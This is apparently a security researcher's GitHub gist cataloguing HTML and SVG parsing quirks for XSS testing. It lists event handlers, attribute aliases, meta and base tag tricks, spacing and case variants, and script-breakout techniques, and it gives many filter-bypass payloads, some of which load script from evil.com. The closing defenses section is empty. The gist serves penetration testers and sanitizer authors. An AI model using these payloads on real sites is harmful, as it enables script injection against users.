@aravindkumarsvg
Last active November 11, 2025 09:40
HTML Quirks and XSS Cheat Sheet


A reference of quirks, behaviors, and security-relevant properties in HTML5 + SVG, useful for penetration testing, payload crafting, and filter bypass research.


HTML Elements Parsing quirks - link mXSS CheatSheet


📌 1. Event Handler Quirks

| Event | Elements Allowed | Notes |
|---|---|---|
| onload | <body>, <img>, <iframe>, <link>, <script>, <style>, <object>, <embed>, <input type=image> | Fires when resource loads successfully; <video> and <audio> do not fire load and use onloadstart / onloadeddata / oncanplay instead |
| onerror | <img>, <script>, <link>, <audio>, <video>, <object>, <embed>, <iframe> | Fires on load failure, very common XSS sink |
| onunload | <body> | Fires when leaving a page |
| onbeforeunload | <body> | Prompts before page exit |
| onmouseover, onmouseout, onclick | Almost any visible element | Used in svg, a, button, etc. |
| onanimationstart, onanimationend, onanimationiteration | Elements with CSS animations applied | CSS-based triggers |
| onfocus, onblur | Interactive elements (input, textarea, button, a, iframe) | Can trigger by script focus |
| onresize | <body>, <iframe>, <svg> | Fires on dimension changes |
| onhashchange | window (not element) | Fires on URL fragment change |

📌 2. Attribute Quirks

| Attribute | Elements | Quirk / Behavior |
|---|---|---|
| src | <img>, <iframe>, <script>, <audio>, <video>, <embed>, <track> | Accepts data: URLs, blob: URLs |
| srcset | <img>, <source> | Can bypass naive filters (chooses best candidate) |
| href | <a>, <link>, <area>, <base> | Supports javascript: scheme unless blocked |
| action | <form> | Accepts javascript: URIs in some browsers |
| style | Global | Can embed expression() in old IE, url(javascript:...) blocked in modern |
| value | <input>, <option>, <textarea> | Can be injected into DOM/text directly |
| poster | <video> | Resource fetch + onerror possible |
| srcdoc | <iframe> | Inline HTML document; runs in the embedding page's origin unless the sandbox attribute is set |
| contenteditable | Global | Editable area that can inject HTML |
| autofocus | <input>, <textarea>, <button> | Steals focus automatically |
| download | <a> | Forces file download, name override |
| formaction | <button>, <input type=submit/image> | Overrides parent <form action> |

📌 3. SVG-Specific Quirks

| Element | Attribute | Quirk |
|---|---|---|
| <svg> | xmlns, xmlns:xlink | Declares the SVG and XLink namespaces; required when the file is parsed as XML, optional for inline SVG in an HTML document |
| <a> | href / xlink:href | Supports navigation, animatable |
| <animate> | attributeName | Modifies host element's attributes (can overwrite href) |
| <set> | attributeName | Instantly sets a host element's attribute |
| <foreignObject> | (none) | Allows embedding full HTML inside SVG; the HTML is processed in the SVG context |
| <script> | (inline JS) | Executes unless CSP blocks |
| <use> | xlink:href to reference symbols | Can link external SVG with script |
| <image> | href | Loads external resource, onerror available |

πŸ“Œ 4. HTML Element Families with Quirks

Media & Embeds

  • <img>: supports onerror, onload, srcset, sizes
  • <iframe>: srcdoc, onload, navigation quirks
  • <object> / <embed>: loads arbitrary resources, MIME-sniffing issues
  • <video> / <audio>: multiple event hooks (oncanplay, onerror, etc.)
  • <track>: loads external file, can trigger fetch

| Element | Quirk / Behavior | Notes |
|---|---|---|
| <img> | Triggers onerror when loading fails | Commonly used for XSS payloads |
| <img> | Supports srcset / sizes, multiple load sources | Could bypass naive filters |
| <iframe> | onload fires when src loads, or empty src loads parent again | Useful for injection & self-DOS |
| <iframe> | Navigates sandboxed content unless restricted | Used in clickjacking, data exfiltration |
| <video> | onerror, oncanplay events fire | Can embed <track> with extra URLs |
| <audio> | Similar to <video> with source fallback | onerror triggers |
| <object> | Can load arbitrary URLs, including data URIs | Often disabled via CSP |
| <embed> | Same as <object>, legacy plugin behavior | CSP needed |

Forms

  • <input type=image>: submits click coordinates
  • <input>: autofocus, formaction
  • <textarea>: unescaped reflection vector
  • <form>: action=javascript:... in some browsers
  • <button>: defaults to type=submit if omitted, which can break app logic

Scripting

  • <script>: classic inline execution
  • <noscript>: its content is rendered only if JS is disabled
  • <template>: inert until cloned, can be abused

Interactive

  • <details> / <summary>: built-in toggle UI
  • <marquee>: deprecated but still rendered in Chromium
  • <base>: changes global relative URL resolution
  • <bgsound> (IE only): auto-plays sound from URL; rare but dangerous
  • <link rel=stylesheet>: can import attacker CSS; CSS injection → data exfiltration

📝 Text & Metadata Elements

| Element | Quirk / Behavior | Notes |
|---|---|---|
| <title> | Contents reflected in browser chrome | Can be abused for phishing UI |
| <style> | Can embed @import url(javascript:...) in older browsers | Modern browsers block JS schemes |
| <meta http-equiv=refresh> | Triggers auto navigation | Old-school redirect payload |
| <meta name=referrer> | Controls outgoing Referer header | Useful for privacy / CSRF |
| <meta http-equiv=content-security-policy> | Can inject a CSP if allowed | Dangerous if misused |

πŸ“Œ 5. Properties & Edge Cases

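  • Case insensitivity: HTML tag and attribute names are case-insensitive (<ScRiPt> works). SVG is case-sensitive when parsed as XML; inside an HTML document the parser lowercases names and then restores the casing of known SVG names such as foreignObject.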
  • Null byte / encoding quirks: Some parsers mishandle %00, %0d%0a.
  • Whitespace quirks: Tabs, newlines, or backticks can sometimes bypass regex-based filters.
  • Data URIs: Work across many elements; data:text/html,<script>alert(1)</script> is classic.
  • CSP interactions: Some quirks still work under weak CSP if not covering data:, blob:, inline event handlers.

🧩 Quirks of <head> and Head-Related Tags

1. <head> Itself

  • Normally contains metadata (not rendered visually).

  • Script execution still works inside <head>.

  • Injection quirks:

    • If you can inject before closing </head>, you can add new tags (<script>, <style>, <meta>, etc.).
    • Some browsers auto-close <head> if unexpected tags appear, which moves your payload into <body>.

2. <title>

  • Displays in the browser tab and search results.

  • Quirks:

    • Only text is allowed; HTML tags are rendered as plain text.

    • Useful for reflected XSS detection: if input shows up inside <title>, you can't execute JS directly, but you can break out of <title> and inject a <script> or other element.

    • Example:

      </title><script>alert(1)</script>

3. <style>

  • Used for CSS rules.

  • Quirks:

    • Does not allow JS directly.

    • CSS injection possible (e.g., leaking data via url() or abusing expression() in old IE).

    • Example:

      <style>
        body { background:url("javascript:alert(1)") } /* IE only */
      </style>
    • In modern browsers: look for CSS-based exfiltration instead.


4. <meta>

  • Defines metadata (charset, viewport, redirects, etc.).

  • Quirks:

    • <meta http-equiv="refresh"> can trigger client-side redirects:

      <meta http-equiv="refresh" content="0;url=javascript:alert(1)">

      🚨 Works in old browsers, mostly blocked in modern ones.

    • <meta charset> can be abused in XSS polyglots:

      • Different charsets (UTF-7, Shift-JIS) may cause misinterpretation of payload.

5. <link>

  • Defines external resources (CSS, icons, prefetch).

  • Quirks:

    • <link rel="stylesheet" href="javascript:alert(1)">

      Used to work in IE, not in modern browsers.

    • <link rel="import" href="..."> (deprecated HTML Imports) could include scripts.


6. <script>

  • Inline JavaScript executes immediately:

    <script>alert(1)</script>
  • External JavaScript via src= attribute.

  • Quirks:

    • Can bypass some filters by using / instead of whitespace between the tag name and the attribute:

      <script/src=//evil.com></script>
    • MIME-type quirks in some browsers (e.g., text/html executed as JS in old versions).


7. <base>

  • Defines the base URL for all relative links.

  • Quirk:

    • If an attacker can inject <base href="http://evil.com/">, all relative URLs resolve against the attacker's domain.
    • Useful for phishing & injection chaining.
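
The effect of an injected <base> on relative URLs can be sketched with the URL constructor, which resolves a relative reference against a base the same way the browser does. The page URL and file names below are hypothetical; only http://evil.com/ comes from the example above.

```javascript
// Resolve a relative URL the way a browser would once a given base is in effect.
function resolveWithBase(relativeUrl, baseHref) {
  return new URL(relativeUrl, baseHref).href;
}

const pageUrl = "https://victim.example/app/index.html"; // hypothetical page URL
const injectedBase = "http://evil.com/";                 // value of the injected <base href>

// Without <base>, relative URLs resolve against the page itself.
console.log(resolveWithBase("js/app.js", pageUrl));
// With the injected <base>, the same reference now points at the attacker's host.
console.log(resolveWithBase("js/app.js", injectedBase));
// Root-relative paths move as well.
console.log(resolveWithBase("/login", injectedBase));
// Absolute URLs are unaffected by <base>.
console.log(resolveWithBase("https://cdn.example/x.js", injectedBase));
```

This is why relative script and form URLs are the interesting targets when testing a <base> injection: anything written as an absolute URL keeps pointing at its original host.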

8. <noscript>

  • Displays fallback content when JS is disabled.

  • Quirks:

    • Can contain HTML: the payload renders as normal HTML if JS is disabled, and is treated as inert raw text if JS is enabled.
    • Useful in polyglots for dual-context execution.

9. <object>, <embed>, <applet> (rarely used but allowed in <head>)

  • Historically abused to load external resources.

  • Examples:

    <object data="javascript:alert(1)"></object>
    <embed src="data:text/html,<script>alert(1)</script>"></embed>

✅ Summary: If injection lands inside <head>, try:

  • Breaking out with </tag> and injecting <script> or <meta http-equiv="refresh">.
  • Abuse <base> to hijack relative paths.
  • Abuse <style> for CSS injection.
  • Abuse <title> for detection and filter evasion.

Quirks of the <meta> Tag in HTML

The <meta> tag is normally used in the <head> of an HTML document to define metadata about the page. However, it comes with several quirks and special behaviors depending on the attribute and browser implementation.


1. Charset Declaration

<meta charset="UTF-8">
  • Must be inside <head>, within the first 1024 bytes of the document.
  • Declares the encoding of the document.
  • Quirk: If multiple <meta charset> tags exist, the first one takes precedence.

2. Refresh / Redirect

<meta http-equiv="refresh" content="5; url=https://example.com">
  • Refreshes the page after N seconds.

  • Can redirect the user to another URL.

  • Quirk: Some older browsers accepted a javascript: URL in the url= part of the content attribute:

    <meta http-equiv="refresh" content="0;url=javascript:alert(1)">

    Modern browsers usually block this.
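
When reviewing reflected <meta http-equiv="refresh"> values, it helps to pull the target out of the content string and look at its scheme. The sketch below is a simplified reading of the "<seconds>; url=<target>" format, not the full algorithm from the HTML Standard; parseRefresh and refreshTargetsScript are hypothetical helper names, and the page URL is an assumption.

```javascript
// Simplified parse of a refresh content value: "<seconds>[;,] [url=]<target>".
// Hypothetical helper; the real parsing rules cover more edge cases.
function parseRefresh(content) {
  const match = /^\s*(\d+)(?:\.\d*)?\s*(?:[;,]\s*(?:url\s*=\s*)?(['"]?)(.*?)\2\s*)?$/i.exec(content);
  if (!match) return null;
  return { delay: Number(match[1]), url: match[3] || null };
}

// True when the refresh target resolves to a javascript: URL.
// The URL parser lowercases the scheme and strips leading spaces,
// so "  JavaScript:..." is caught as well.
function refreshTargetsScript(content, pageUrl) {
  const parsed = parseRefresh(content);
  if (!parsed || parsed.url === null) return false;
  try {
    return new URL(parsed.url, pageUrl).protocol === "javascript:";
  } catch {
    return false; // unparseable target
  }
}

const page = "https://victim.example/"; // hypothetical page URL
console.log(refreshTargetsScript("0;url=javascript:alert(1)", page));
console.log(refreshTargetsScript("5; url=https://example.com", page));
```

Checking the parsed scheme rather than searching the raw string for "javascript:" avoids missing case and whitespace variants.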


3. Content-Security-Policy (CSP)

<meta http-equiv="Content-Security-Policy" content="default-src 'self'">
  • Defines security policies.
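  • Quirk: Only honored inside <head>, and it applies only to content that follows it, so scripts that appear before the tag are not restricted. The frame-ancestors, report-uri, and sandbox directives are ignored when the policy is delivered via <meta>.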

4. X-UA-Compatible (IE Quirk)

<meta http-equiv="X-UA-Compatible" content="IE=edge">
  • Forces Internet Explorer to render in a specific mode.
  • Quirk: If placed after other elements, it may not work.

5. Viewport (Mobile Rendering)

<meta name="viewport" content="width=device-width, initial-scale=1.0">
  • Controls scaling and layout on mobile devices.
  • Quirk: Multiple viewport tags can cause unpredictable rendering behavior.

6. Open Graph & Social Media Tags

<meta property="og:title" content="Example Title">
  • Used by Facebook, Twitter, LinkedIn for link previews.
  • Quirk: Duplicate Open Graph tags → undefined behavior (usually first wins).

7. MIME-Type Sniffing Control

<meta http-equiv="X-Content-Type-Options" content="nosniff">
  • Intended to prevent MIME type sniffing in browsers.
  • Quirk: Must be sent as an HTTP response header to take effect; it is not a standard http-equiv value, and browsers generally ignore the <meta> form.

8. Cookie Setting (Old Quirk)

<meta http-equiv="Set-Cookie" content="session=12345; path=/">
  • Used in older browsers to set cookies.
  • Quirk: No longer supported in modern browsers.

9. Other Rarely Used http-equiv Values

  • default-style → Chooses a preferred stylesheet.
  • refresh → Page auto-reload.
  • cache-control → Legacy cache instructions.

Security Implications

  • Redirects: <meta http-equiv="refresh"> can be abused for phishing.
  • CSP: Weak CSP in <meta> is bypassable if not placed first.
  • Charset Mismatch: Can cause XSS via misinterpreted encodings.

✅ Summary:

  • <meta> has quirks tied mostly to http-equiv.
  • Some attributes (refresh, charset, X-UA-Compatible) behave differently depending on browser and placement.
  • Many legacy quirks are still relevant for security testing (redirects, cookie setting, charset confusion).

HTML Syntax Quirks

This document lists quirks in HTML parsing that browsers "fix" automatically. These quirks are often exploited for XSS bypasses.


1. Slash Inside Tags

Browsers accept / as a separator between the tag name and its attributes, and between attributes.

<img/src/onerror=prompt(8)>
<img src/onerror=prompt(8)>

✅ Both interpreted as <img src onerror=prompt(8)>.


2. Alias Tags

Some tags have aliases or equivalent meanings.

<image src=q onerror=prompt(8)>

✅ <image> is treated as <img> in HTML5.


3. Unfinished or Broken Closing Tags

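Filters that strip a closing tag once, without re-scanning their output, can reassemble it.

</scrip</script>t><img src=q onerror=prompt(8)>

✅ After a single-pass removal of </script>, the output is:

</script><img src=q onerror=prompt(8)>

The browser itself does not merge the fragments. Sent unfiltered, the malformed end tag is dropped with a parse error and the <img> still parses as markup.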

4. Attribute Value Quirks

Extra spaces or missing quotes are tolerated.

<img src = q onerror=prompt(8)>

✅ Same as <img src=q onerror=prompt(8)>.


5. Tag Auto-Correction

Browsers lowercase tag names; misspelled names are not corrected.

<imG>      → <img>
<imaage>   → unknown element (not treated as <img>)
<image>    → <img>

6. Mixed-Case Attributes

Event attributes and tag names are case-insensitive.

<ImG SrC=x OnErRoR=prompt(8)>

✅ Works the same as <img src=x onerror=prompt(8)>.


7. SVG Namespaces

SVG allows unusual tag names and attributes.

<svg/onload=prompt(8)>

✅ Works in browsers that parse it as <svg onload=prompt(8)>.


Summary of Common Quirks

  • / between the tag name and attributes is allowed.
  • <image> works like <img>.
  • Broken tags like </scrip</script>t> are reassembled by filters that strip </script> only once.
  • Attribute spacing and quoting are optional in many cases.
  • Tags and attributes are case-insensitive.
  • SVG allows alternate parsing contexts.
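
To see why these quirks matter for filter bypass, the sketch below runs the payloads from this section against a deliberately naive regular expression. The pattern is a hypothetical stand-in for a weak filter, not taken from any real product.

```javascript
// Deliberately naive filter (hypothetical): it expects whitespace after the
// tag name and only knows about <img ... onerror=...>.
const naiveFilter = /<img\s+[^>]*\bonerror\s*=/i;

function isBlocked(payload) {
  return naiveFilter.test(payload);
}

const payloads = [
  "<img src=q onerror=prompt(8)>",   // textbook form
  "<ImG SrC=x OnErRoR=prompt(8)>",   // mixed case
  "<img/src/onerror=prompt(8)>",     // "/" instead of whitespace
  "<image src=q onerror=prompt(8)>", // <image> alias
  "<svg/onload=prompt(8)>",          // different tag and handler
];

for (const payload of payloads) {
  console.log(isBlocked(payload) ? "blocked" : "missed ", payload);
}
```

The case-insensitive flag handles the mixed-case variant, but the slash separator, the <image> alias, and the SVG payload all get past this pattern, which is the usual argument for parsing markup with a real HTML parser instead of matching it with regexes.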

HTML Event Handler Quirks

This document explores quirks in how browsers interpret event handler attributes (e.g., onload, onerror), and how attackers may exploit inconsistencies in parsing, escaping, and case-sensitivity.


1. General Quirks

Case-Insensitivity

  • HTML attribute names are case-insensitive.

  • Examples:

    <img OnErRoR=alert(1) src=x>
    <img ONERROR=alert(1) src=x>

Encoding / Escaping

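  • Character references (HTML entities) are decoded in attribute values, not in attribute names. An encoded or look-alike attribute name only matters when some server-side layer decodes or normalizes the markup before the browser sees it.

  • Examples:

    <img src=x onerror=&#x61;lert(1)>   <!-- value decodes to alert(1); the handler runs -->
    <img src=x onerror=\u0061lert(1)>   <!-- JavaScript Unicode escape inside the identifier; the handler runs -->
    <img src=x &#x6f;nerror=alert(1)>   <!-- entity in the name is not decoded; no handler is created -->
    <img src=x οnerror=alert(1)>        <!-- homoglyph "ο" (Greek omicron); a different attribute name, no handler -->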

Attribute Splitting

  • Browsers sometimes treat / or unusual placement as attribute delimiters.

  • Examples:

    <img/src/onerror=alert(1)>
    <img src/onerror=alert(1)>

Broken Tag Parsing

  • Browsers recover from broken markup and continue parsing, and a filter that strips </script> only once reassembles the tag from the fragments around it.

  • Examples:

    </scrip</script>t><img src=x onerror=alert(1)>

2. Element-Specific Event Quirks

<img>

  • onerror triggers if the image fails to load.

  • Tricks:

    <img src=q onerror=alert(1)>
    <img/src/onerror=alert(1)>
    <img src onerror=alert(1)>
    <image src=q onerror=alert(1)>

<svg>

  • SVG supports many event quirks:

    • onload on <svg> root
    • Animations modifying attributes (<animate>, <set>)
    • Namespaced attributes (some bypass filters)
  • Examples:

    <svg onload=alert(1)>
    <svg><a><animate attributeName=href values=javascript:alert(1) /></a></svg>

<iframe>

  • onload triggers once the frame loads.

  • Examples:

    <iframe src=javascript:alert(1)>
    <iframe onload=alert(1)>

<body>

  • Supports onload, onunload, onresize, etc.

  • Example:

    <body onload=alert(1)>

<input> / Form Elements

  • autofocus fires onfocus without user interaction; other focusable elements can be focused by navigating to #id when they carry an id.

  • Example:

    <input autofocus onfocus=alert(1)>

3. Payload Examples

Encoded Events

<img src=x onerror=&#97;lert(1)>

Split Attributes

<img/src/onerror=alert(1)>

Case Variants

<img src=x oNeRrOr=alert(1)>

Broken Tags

</scrip</script>t><img src=x onerror=alert(1)>

4. Notes

  • Browsers behave differently:
    • Chrome is stricter with malformed entities than Firefox.
    • Legacy IE accepted even stranger quirks (e.g., backticks).
  • Modern CSP (Content Security Policy) and sanitizers often aim to block these, but filter bypasses still exist in weakly-protected apps.

🔗 HTML & SVG Attribute Equivalents / Alternatives Cheatsheet

A quick reference for VAPT engineers to bypass weak filters by leveraging alternate or lesser-known attributes that achieve the same effect.


1. Navigation / Linking

| Main Attribute | Equivalent / Variant | Notes |
|---|---|---|
| href (<a>, <link>) | xlink:href (SVG <a>, <use>, <image>) | Many filters block href but forget xlink:href. |
| src (<img>, <script>, <iframe>, <audio>, <video>) | xlink:href (SVG <image>, <script>) | Both load external resources. |
| formaction (<button>, <input type="submit">) | action (<form>) | Defines where form submits. |
| poster (<video>) | src (<img>) | Can trick scanners that only check <img src>. |

2. Embedding / Including External Resources

| Main Attribute | Equivalent / Variant | Notes |
|---|---|---|
| srcdoc (<iframe>) | data: URI in src | Inline HTML injection vector. |
| data (<object>) | src (<embed>, <iframe>) | Both can embed resources. |
| codebase (<object>, deprecated) | archive (<applet>, deprecated) | Old but sometimes still parsed. |

3. Image / Media Loading

| Main Attribute | Equivalent / Variant | Notes |
|---|---|---|
| srcset (<img>) | src | Browser picks source depending on screen size. |
| poster (<video>) | src (<img>) | Poster can embed attacker-controlled images. |
| background (<body>, deprecated) | style="background:url(...)" | Legacy background loading. |

4. Event Handlers

| Main Attribute | Equivalent / Variant | Notes |
|---|---|---|
| onload (<img>, <iframe>, <script>) | onerror (<img>, <video>, <audio>) | onerror often less filtered. |
| onclick | onfocus, onmouseover, onpointerdown | Same interaction goal. |
| onanimationstart | onbegin (SVG <animate>) | Timing-based triggers. |

5. Form Inputs

| Main Attribute | Equivalent / Variant | Notes |
|---|---|---|
| value (<input>, <option>) | defaultValue (<input>) | Some filters ignore defaults. |
| name | id | Some backends bind values by either. |
| action (<form>) | formaction (<button>, <input type=submit>) | Submission control bypass. |

6. Metadata / Redirection

| Main Attribute | Equivalent / Variant | Notes |
|---|---|---|
| <meta http-equiv="refresh"> | <meta http-equiv="location"> (non-standard) | Open redirect tricks. |
| <meta http-equiv="set-cookie"> | document.cookie (via JS) | Cookie manipulation. |

✅ Why this matters in VAPT

Many filters only blacklist common attributes (href, src, onload). Knowing their cousins / aliases lets you bypass weak sanitizers. For example:

  • If href is blocked → try xlink:href in <svg><a>.
  • If onload is blocked → use onerror in <img>.
  • If src is blocked → abuse data in <object> or poster in <video>.
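
The blocklist weakness described above can be sketched by comparing a blocklist with an allowlist over the same attribute names. Both sets below are hypothetical policies chosen for illustration; a real sanitizer would also have to validate attribute values.

```javascript
// Hypothetical weak policy: reject only the "well-known" dangerous names.
const BLOCKED_ATTRIBUTES = new Set(["href", "src", "onload"]);

// Hypothetical strict policy: accept only names known to be harmless.
const ALLOWED_ATTRIBUTES = new Set(["alt", "title", "width", "height", "class"]);

// Attribute names are case-insensitive in HTML, so normalize before comparing.
function passesBlocklist(name) {
  return !BLOCKED_ATTRIBUTES.has(name.toLowerCase());
}

function passesAllowlist(name) {
  return ALLOWED_ATTRIBUTES.has(name.toLowerCase());
}

// Aliases and cousins taken from the tables in this cheatsheet.
const candidates = ["xlink:href", "onerror", "formaction", "poster", "srcdoc", "data", "ALT"];

for (const name of candidates) {
  console.log(name, "blocklist:", passesBlocklist(name), "allowlist:", passesAllowlist(name));
}
```

Every alias in the list slips past the blocklist, while the allowlist rejects all of them and still accepts a harmless attribute such as alt regardless of case.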

🛠️ HTML Attribute Quirks Cheatsheet: accesskey & canonical

This cheatsheet covers quirks and abuse scenarios related to the accesskey attribute and the <link rel="canonical"> tag.
Useful for VAPT engineers who need quick recall of edge cases.


1. accesskey Attribute

🔹 What It Does

  • Assigns a keyboard shortcut to an element (anchor, button, input, etc.).
  • Example:
    <a href="https://example.com" accesskey="x">Go</a>
    → Pressing Alt+Shift+X (Chrome/Windows) will activate the link.

🔹 Browser Support / Quirks

| Browser | Shortcut Combination | Notes |
|---|---|---|
| Chrome (Win/Linux) | Alt + Shift + key | Overrides some native keys. |
| Firefox (Win/Linux) | Alt + Shift + key | Slightly different per locale. |
| Safari (macOS) | Ctrl + Option + key | Conflicts with screen readers. |
| IE/Edge (Legacy) | Alt + key, then Enter | Quirky and inconsistent. |

🔹 Security / Abuse Potential

  • UI Redressing / Clickjacking: Attacker assigns accesskey values that collide with shortcuts the user already relies on, so a habitual key press triggers navigation. accesskey binds a single character, so system combinations such as Alt+F4 or Alt+Tab cannot be claimed.
  • Shortcut Collision: Can hijack common accessibility shortcuts, confusing visually impaired users.
  • Phishing: Hidden accesskey triggers redirect (<a href="http://evil.com" accesskey="h">).
  • CSRF Vector: If shortcut triggers POST form submission → may cause silent CSRF when user accidentally presses key combo.
  • Privilege Escalation: If bound to admin-only functionality (e.g., "Delete user" button), it can be abused if misconfigured.

2. <link rel="canonical"> Tag

🔹 What It Does

  • Declares the preferred (canonical) URL of a page for SEO indexing.
  • Example:
    <link rel="canonical" href="https://example.com/page">

🔹 Quirks & Risks

  1. Open Redirect via Canonical

    <link rel="canonical" href="https://evil.com/">
    • If an app reflects unvalidated user input here, crawlers treat the attacker URL as the preferred location. Browsers do not navigate on rel="canonical", so this is a redirect only from the crawler's point of view.
    • Search engines may send traffic to attacker site.
  2. SEO Poisoning

    • If attacker can inject their own canonical link:
      • Victim page is de-indexed in favor of attacker's page.
      • Useful in phishing campaigns.
  3. Bypassing URL Filters

    • Some crawlers or scanners respect canonical URLs.
    • Pentesters can test URL normalization issues.
  4. Canonicalization Collisions

    • Example:
      <link rel="canonical" href="https://example.com/%2e%2e/admin">
    • Browsers and search engines may interpret differently → bypass filters.
  5. XSS Vector (rare)

    • Some old HTML sanitizers failed to handle <link> properly.
    • Example payload:
      <link rel="canonical" href="javascript:alert(1)">
    • Most modern browsers ignore javascript: here, but worth testing.

✅ VAPT Takeaways

  • accesskey

    • Check for unexpected keyboard hijacking or hidden shortcuts.
    • Can be abused for CSRF triggers and UX redressing.
    • Test across different OS/browser combos (shortcut differences).
  • canonical

    • Validate href → must be same-origin and absolute.
    • Look for open redirect or SEO poisoning vectors.
    • Normalize and compare encoded URLs (%2e%2e, //, etc.).
    • Treat any user-controlled canonical link as a red flag.
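
The canonical checks above (absolute, same-origin, normalized) can be sketched with the URL parser. isAcceptableCanonical is a hypothetical helper name, and the page URL is an assumption for the example.

```javascript
// Accept a canonical href only if it is an absolute http(s) URL on the page's own origin.
function isAcceptableCanonical(href, pageUrl) {
  let candidate;
  try {
    candidate = new URL(href); // no base argument: relative values throw and are rejected
  } catch {
    return false;
  }
  if (candidate.protocol !== "https:" && candidate.protocol !== "http:") return false;
  return candidate.origin === new URL(pageUrl).origin;
}

const page = "https://example.com/page?ref=1"; // hypothetical page URL

console.log(isAcceptableCanonical("https://example.com/page", page));
console.log(isAcceptableCanonical("https://evil.com/", page));
console.log(isAcceptableCanonical("javascript:alert(1)", page));
console.log(isAcceptableCanonical("//evil.com/x", page));

// Comparing the parsed pathname, not the raw string, shows how an encoded
// dot-segment such as %2e%2e is normalized by the URL parser.
console.log(new URL("https://example.com/%2e%2e/admin").pathname);
```

Comparing parsed origins instead of string prefixes also avoids look-alike hosts such as https://example.com.evil.com/.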

HTML Spacing Quirks Cheatsheet

This cheatsheet covers quirks in HTML parsing related to spacing between attributes and tags, useful for VAPT engineers.


1. Multiple Spaces Between Attributes

HTML parsers skip any run of whitespace between attributes.

<img        src="X"        onerror="alert(1)">

✅ Still works.


2. Newlines Between Attributes

Newlines are also treated as whitespace.

<img
   src="X"
   onerror="alert(1)">

✅ Still works.


3. Tabs / Form Feeds

Tabs, form feeds, and other whitespace characters are allowed between attributes.

<img    src="X" onerror="alert(1)">

✅ Still works.


4. No Space Between Attributes

Even without space, HTML parsers correctly separate attributes as long as the value is closed with quotes.

<img src="X"onerror="alert(1)">

✅ Works in HTML.

❌ Fails in XML/XHTML, since whitespace between attributes is required.


5. No Space Between Tag Name and Attribute

Without a separator, the attribute text becomes part of the tag name:

<imgsrc="X">        <!-- parsed as an unknown element, not as <img> -->

Correct form:

<img src="X">

6. Mixed Case Attribute Names

HTML is case-insensitive for attribute names.

<img SRC="X" ONERROR="alert(1)">

✅ Works.


7. Attribute Value Without Quotes

Quotes around values are optional if the value has no spaces or special characters.

<img src=X onerror=alert(1)>

✅ Works.

But fails if value has space:

<img src=hello world> <!-- src is "hello"; world becomes a separate attribute -->

8. Spacing Before/After Equal Sign

Browsers allow spaces around the = sign.

<img src = "X" onerror = "alert(1)">

✅ Works.


9. Trailing Slash Quirks

<img src="X" onerror="alert(1)"/>

✅ Works in HTML5 (trailing slash ignored).
❌ In XHTML, trailing slash required for self-closing.


10. Important Note: HTML vs. XML

  • HTML is lenient with spacing quirks.
  • XML/XHTML is strict: attributes must be separated by whitespace, quoted properly, and case-sensitive.

Key Exploit Payload Example

<img src="X"onerror="alert(document.domain)">

✅ Bypasses some filters that expect space before event handlers.
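
A detector that tolerates these spacing quirks has to split attributes roughly the way the HTML tokenizer does. The sketch below is a simplified approximation for a single start tag (it ignores character references and several error cases); attributeNames and hasEventHandler are hypothetical helper names.

```javascript
// Extract lowercased attribute names from one start tag, approximating the
// HTML tokenizer: whitespace and "/" separate attributes, a quoted value may
// be followed directly by the next attribute, and an unquoted value runs
// until whitespace or ">".
function attributeNames(tag) {
  const isSpace = (c) => c === " " || c === "\t" || c === "\n" || c === "\f" || c === "\r";
  const names = [];
  let i = 1; // skip "<"

  // Tag name ends at whitespace, "/" or ">".
  while (i < tag.length && !isSpace(tag[i]) && tag[i] !== "/" && tag[i] !== ">") i++;

  while (i < tag.length && tag[i] !== ">") {
    if (isSpace(tag[i]) || tag[i] === "/") { i++; continue; }

    // Attribute name: the first character always belongs to the name.
    const start = i++;
    while (i < tag.length && !isSpace(tag[i]) && tag[i] !== "/" && tag[i] !== ">" && tag[i] !== "=") i++;
    names.push(tag.slice(start, i).toLowerCase());

    while (i < tag.length && isSpace(tag[i])) i++;
    if (tag[i] !== "=") continue; // attribute without a value

    i++; // skip "="
    while (i < tag.length && isSpace(tag[i])) i++;
    const quote = tag[i];
    if (quote === '"' || quote === "'") {
      i++;
      while (i < tag.length && tag[i] !== quote) i++;
      i++; // skip closing quote
    } else {
      while (i < tag.length && !isSpace(tag[i]) && tag[i] !== ">") i++;
    }
  }
  return names;
}

function hasEventHandler(tag) {
  return attributeNames(tag).some((name) => name.startsWith("on"));
}

console.log(attributeNames('<img src="X"onerror="alert(document.domain)">'));
console.log(attributeNames("<img/src/onerror=alert(1)>"));
console.log(attributeNames("<img src= onerror=alert(1)>")); // the value swallows "onerror=alert(1)"
```

The last call illustrates a case that cuts the other way: after "src=" the tokenizer skips whitespace and takes the following text as the value, so no onerror attribute exists.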


Script Breakout Quirks in HTML/JavaScript

Script breakout refers to techniques where injected data inside a <script> block prematurely closes the script context and executes arbitrary HTML/JS. This is highly relevant in XSS testing.


1. Basic Script Breakout

<script>
var a = '</script><img src=x onerror=alert(1)>';
</script>
  • The injected </script> ends the script tag.
  • This happens because the HTML parser looks for </script> before any JavaScript is parsed, so a closing tag inside a JavaScript string still ends the element.
  • Remaining payload is parsed as HTML → leads to XSS.

2. Breaking Out of Strings

<script>
var data = 'test';
var a = '</script><img src=x onerror=alert(1)>';
</script>
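  • Injection inside JS string contexts (', ", or `) does not need a closing quote for this breakout: the HTML parser ends the script at </script> regardless of JavaScript string state. A closing quote is needed only when the goal is to keep executing inside the same script.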

Example:

<script>
var a = 'evil'; // attacker input
// attacker sends: ';</script><img src=x onerror=alert(1)>'
</script>

3. Comment-Based Breakout

<script>
// attacker payload:
  var x = '</script><img src=x onerror=alert(1)><!--';
</script>
  • A trailing HTML comment opener (<!--) swallows the leftover script text (such as ';) so it is not rendered on the page.

4. Escaping Using Encodings

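  • The HTML parser matches the literal text </script (case-insensitively) and does not decode anything inside a script block. Encoded forms only break out when another layer decodes them before the page is served:

    • HTML entities: </scr&#x69;pt>
    • Unicode escapes: </scr\u0069pt>
    • Base64 inside data URIs

Example:

<script>
var a = '</scr\u0069pt><img src=x onerror=alert(1)>';
</script>

Served as-is, this stays inside the string and does not break out; it becomes dangerous only if the escape is decoded server-side first.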

5. Nested Breakouts

<script>
var a = '</scr</script>ipt><img src=x onerror=alert(1)>';
</script>
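  • The intact inner </script> closes the element; the fragments around it are left behind as text.
  • A naive sanitizer that strips </script> once reassembles a new </script> from the outer fragments.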

6. JSON & Script Breakouts

<script>
var json = '{"key": "</script><img src=x onerror=alert(1)>"}';
</script>
  • Injection inside JSON strings embedded in JS can still allow breakout.

7. Template Literals & Breakout

<script>
let tpl = `</script><img src=x onerror=alert(1)>`;
</script>
  • Backticks (`) open up another injection surface.

Security Implications

  • Script breakout is one of the most powerful forms of XSS.

  • Works even when inside JavaScript contexts, as long as attacker can insert </script>.

  • Defenses:

